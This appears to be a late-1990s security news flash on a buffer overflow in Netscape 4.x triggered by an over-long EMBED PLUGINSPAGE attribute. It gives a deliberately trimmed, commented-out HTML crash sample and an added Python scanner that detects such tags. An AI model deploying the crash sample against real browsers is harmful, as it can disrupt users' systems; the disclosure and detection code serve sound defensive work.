A new security hole, caused by a buffer overflow bug, has been discovered in at least some Netscape 4.x browsers.

The security hole, involving the use of the EMBED tag with a very long PLUGINSPAGE attribute, leaves the victim's machine vulnerable to arbitrary command execution. This means a hostile page can run arbitrary code in the browser and can inject a virus or trojan.

An example has been written and put online. The example overwrites the handler address for the access violation, and the exploit code is called when the access violation occurs. The example was coded for Win98, but WinNT and Win95 reportedly contain the same problem. This is a serious problem that can't be avoided. Some have even stated that you should switch to other browsers until Netscape comes up with a fix, and that the least you should do, if you use Netscape to read mail, is make sure that HTML mail is disabled and, if you can't do that, switch to another mail client.

I will not post the location of the example pages with the exploit code, only a trimmed example that will not cause your computer any harm. If correctly executed, it could still crash your browser.

Note: The embed tag has to be on one line and the comment tags removed.

---------cut here-------
<HTML>
<HEAD>
<TITLE>Test</TITLE>
</HEAD>
<BODY>
<!-- EMBED SRC="netscape bug"
PLUGINSPAGE="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa"
TYPE="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" WIDTH="1500"
HEIGHT="1000"> </EMBED -->
</BODY>
</HTML>
---------cut here---------
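
Until a fix is available, HTML can be screened for EMBED tags with over-long attribute values before it reaches the browser or mail client. The scanner below is an added example, not part of the original news flash or the Bugtraq post; the 256-character limit and the names `EmbedAttrScanner` and `scan_html` are assumptions chosen for illustration.

```python
from html.parser import HTMLParser

# Assumption: the page gives no exact overflow length, so this limit is a
# conservative policy value chosen for the example, not a Netscape constant.
MAX_ATTR_LEN = 256


class EmbedAttrScanner(HTMLParser):
    """Collects EMBED attributes whose values exceed MAX_ATTR_LEN."""

    def __init__(self, in_comment=False):
        super().__init__(convert_charrefs=True)
        self.in_comment = in_comment
        self.findings = []  # (attribute name, value length, inside a comment?)

    def handle_starttag(self, tag, attrs):
        if tag != "embed":  # HTMLParser lowercases tag and attribute names
            return
        for name, value in attrs:
            if value is not None and len(value) > MAX_ATTR_LEN:
                self.findings.append((name, len(value), self.in_comment))

    def handle_comment(self, data):
        # A commented-out tag is inert, but reporting it catches defanged
        # samples such as the trimmed example on this page.
        if self.in_comment:
            return
        inner = EmbedAttrScanner(in_comment=True)
        inner.feed("<" + data.strip() + ">")
        inner.close()
        self.findings.extend(inner.findings)


def scan_html(text):
    """Return a list of (attribute, length, in_comment) findings for text."""
    scanner = EmbedAttrScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed samples (not taken from any real page).
LIVE = '<EMBED SRC="x" PLUGINSPAGE="' + "a" * 700 + '" TYPE="t/x">'
COMMENTED = "<!-- " + LIVE[1:-1] + "> </EMBED -->"
BENIGN = '<embed src="movie.swf" pluginspage="http://example.com/plugins">'

if __name__ == "__main__":
    for label, doc in (("live", LIVE), ("commented", COMMENTED), ("benign", BENIGN)):
        print(label, scan_html(doc))
```

A finding with the last field set to `False` is a live tag that a mail gateway or proxy could strip or quarantine; `True` marks a commented-out sample that the browser never parses as a tag.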

Credits:

I first noticed it on a web design forum's mailing list, but later learned that it had been posted on Bugtraq last Thursday; this news flash is generated from both places.